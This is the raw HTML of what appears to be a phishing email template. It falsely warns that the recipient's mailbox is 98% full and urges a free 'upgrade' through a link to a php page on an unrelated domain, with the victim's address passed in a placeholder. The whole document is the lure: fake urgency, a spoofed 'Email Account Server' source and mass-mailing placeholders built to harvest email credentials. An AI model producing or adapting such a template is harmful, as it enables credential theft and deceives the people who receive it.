<HTML><HEAD>
<META name=GENERATOR content="MSHTML 11.00.9600.19377"></HEAD>
<BODY>
<TABLE style="FONT-SIZE: 16px; FONT-FAMILY: arial, verdana, helvetica, sans-serif; FONT-VARIANT: normal; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; TEXT-ALIGN: left; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial">
<TBODY>
<TR>
<TD style="FONT-SIZE: 9pt; FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px" width=30>&nbsp;</TD>
<TD style="FONT-SIZE: 9pt; FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; MARGIN: 0px">
<TABLE style="TEXT-ALIGN: left">
<TBODY>
<TR>
<TD style="FONT-SIZE: 9pt; FONT-FAMILY: arial, verdana, helvetica, sans-serif; MARGIN: 0px">
<TABLE style="TEXT-ALIGN: left; border-radius: 3px" cellSpacing=0>
<TBODY>
<TR>
<TD style="FONT-SIZE: 9pt; BORDER-TOP: rgb(255,0,0) 1px solid; HEIGHT: 16px; FONT-FAMILY: arial, verdana, helvetica, sans-serif; BORDER-RIGHT: rgb(255,0,0) 1px solid; WIDTH: 500px; BORDER-BOTTOM: rgb(255,0,0) 1px solid; MARGIN: 0px; BORDER-LEFT: rgb(255,0,0) 1px solid; BACKGROUND-COLOR: rgb(255,0,0)">
<DIV align=center><FONT color=#ffffff size=2 face=calibri>Mail Quota: (98% Full)</FONT></DIV></TD>
<TD style="FONT-SIZE: 9pt; BORDER-TOP: rgb(29,124,14) 1px solid; HEIGHT: 0px; FONT-FAMILY: arial, verdana, helvetica, sans-serif; BORDER-RIGHT: rgb(29,124,14) 1px solid; WIDTH: 15px; BORDER-BOTTOM: rgb(29,124,14) 1px solid; MARGIN: 0px; BORDER-LEFT: rgb(29,124,14) 1px solid; BACKGROUND-COLOR: rgb(29,124,14)">&nbsp;</TD></TR>
<TR></TR></TBODY></TABLE>&nbsp; 
<TABLE style="TEXT-ALIGN: left" align=center>
<TBODY>
<TR>
<TD style="FONT-SIZE: 9pt; BORDER-TOP: rgb(29,124,14) 1px solid; HEIGHT: 162px; FONT-FAMILY: arial, verdana, helvetica, sans-serif; BORDER-RIGHT: rgb(29,124,14) 1px solid; WIDTH: 470px; BORDER-BOTTOM: rgb(29,124,14) 1px solid; PADDING-BOTTOM: 25px; PADDING-TOP: 25px; PADDING-LEFT: 25px; MARGIN: 0px; BORDER-LEFT: rgb(29,124,14) 1px solid; PADDING-RIGHT: 25px"><FONT size=2 face=verdana>Attention:&nbsp;<B>
 <A onclick="top.Popup.composeWindow('pcompose.php?sendto=droth%40curlnyc.com'); return false;" style="TEXT-DECORATION: underline; COLOR: rgb(0,0,255)" href="mailto:droth@curlnyc.com" target=_blank>[[-Email-]]</A></B><BR><BR>Your Email quota has reached 98% and will soon exceed its limit.&nbsp;<BR>Follow the URL below to upgrade your Email quota to&nbsp;<B>25GB</B>&nbsp;for free to avoid loss of email data.&nbsp;<BR><BR>
<A style="TEXT-DECORATION: underline; COLOR: rgb(17,85,204)" href="http://flat-saito-2545.perma.jp/characters///STORAGELIMITEXCEEDED2015458540001200110001255552/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=[[-Email-]]" target=_blank 
data-saferedirecturl="https://www.google.com/url?q=https://forms.office.com/Pages/ResponsePage.aspx?id%3D79zC40BZqUqWHsuMK8wI7iFmk8WscglBvPSK75lcq2FUNzlXOVUzRFM2VThPS0JFUzg1QVREVTkzMC4u&amp;source=gmail&amp;ust=1562263257558000&amp;usg=AFQjCNEsrXV8x38OuEzlunZpk2u9FIQzqw"><B><FONT color=#38761d>Upgrade Email Quota</FONT></B></A><BR><BR><BR>Source:&nbsp;<B>
 Email Account Server (<A style="TEXT-DECORATION: underline; COLOR: rgb(0,0,255)" href="http://flat-saito-2545.perma.jp/characters/QWWWWWWWWWWWWERRRRRRRRRRRRRRRRRRRRRRRTYYYYYYYYYYYYYYY/XZXXSE345CDC/BBBBBRR4444444/101454858.php?email=[[-Email-]]" target=_blank>[[-Domain-]]</A>) &copy; 2019.</B></FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>